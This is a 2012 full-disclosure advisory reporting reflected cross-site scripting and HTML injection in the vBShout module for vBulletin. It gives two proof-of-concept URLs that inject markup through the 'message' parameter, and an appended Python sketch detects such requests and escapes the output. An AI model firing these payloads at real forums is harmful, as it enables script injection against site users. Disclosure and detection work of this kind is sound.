Date: Sun, 25 Mar 2012 18:04:19 +0300
From: d3v1l <d3v1l.securityshell@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) - Reflected Cross-Site Scripting ( XSS ) & HTML Injection

###############################################################################################################


#  Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) - Reflected Cross-Site Scripting ( XSS )

#  Note:  HTML Injection and Redirect works too

#  Script Page : http://www.dragonbyte-tech.com

#  Date: 24-03-2012

#  Author : Avram Marius Gabriel (d3v1l)

#  RandomStorm  - http://www.randomstorm.com

#  Tested on: Windows XP & Vista


###############################################################################################################


#  The last version of vBulletin vBShout Module suffers from Cross-Site Scripting and HTML Injection
   The issue is located in Shoutbox Search Archive

#  POC:

#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1


#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1


################################################################################################################



# vBShout is the ideal way to keep members on your forum while they wait for replies to their posts.
  It can be used in many ways - as a chat room for members, for staff to discuss issues in realtime,
  as a live-update feed of new posts and threads, as a way to track member milestones

################################################################################################################

-- 
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on Twitter <http://twitter.com/securityshell>
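
A defender-side sketch for the issue reported above, added here and not part of the original advisory or of vBShout's code: it flags archive-search requests in web access logs whose `message` parameter decodes to HTML markup, and shows the value HTML-escaped before it is echoed back. The log lines are constructed, and `render_search_field` with its `<input>` markup is a hypothetical stand-in for the real template, which the advisory does not show.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters a plain-text shout search has no need for.
MARKUP = re.compile(r'[<>"]')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Mar/2012:18:10:01 +0300] "GET /vbshout.php?message=hello&do=archive&instanceid=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Mar/2012:18:11:42 +0300] "GET /vbshout.php?message=%22%3E%3Cb%3Etest%3C%2Fb%3E&s=&do=archive&instanceid=1 HTTP/1.1" 200 5342',
    '203.0.113.9 - - [25/Mar/2012:18:12:05 +0300] "GET /forum/vbshout.php?message=%2522%253E%253Cb%253E&do=archive&instanceid=1 HTTP/1.1" 200 5300',
    '203.0.113.4 - - [25/Mar/2012:18:13:00 +0300] "GET /index.php?message=%3Cb%3E HTTP/1.1" 200 900',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_archive_search(log_line):
    """Return decoded `message` of a markup-carrying archive search, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    params = parse_qs(url.query)
    if not url.path.endswith("/vbshout.php") or params.get("do") != ["archive"]:
        return None
    message = fully_decode(params.get("message", [""])[0])
    return message if MARKUP.search(message) else None


def render_search_field(value):
    """Hypothetical template helper: echo the search term HTML-escaped."""
    return '<input type="text" name="message" value="%s">' % html.escape(value, quote=True)


if __name__ == "__main__":
    for hit in filter(None, map(flag_archive_search, SAMPLE_LOG)):
        print("flagged:", hit, "->", render_search_field(hit))
```

Escaping on output is what removes the reflection; the log check only helps spot probing of installs that still run an affected version.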
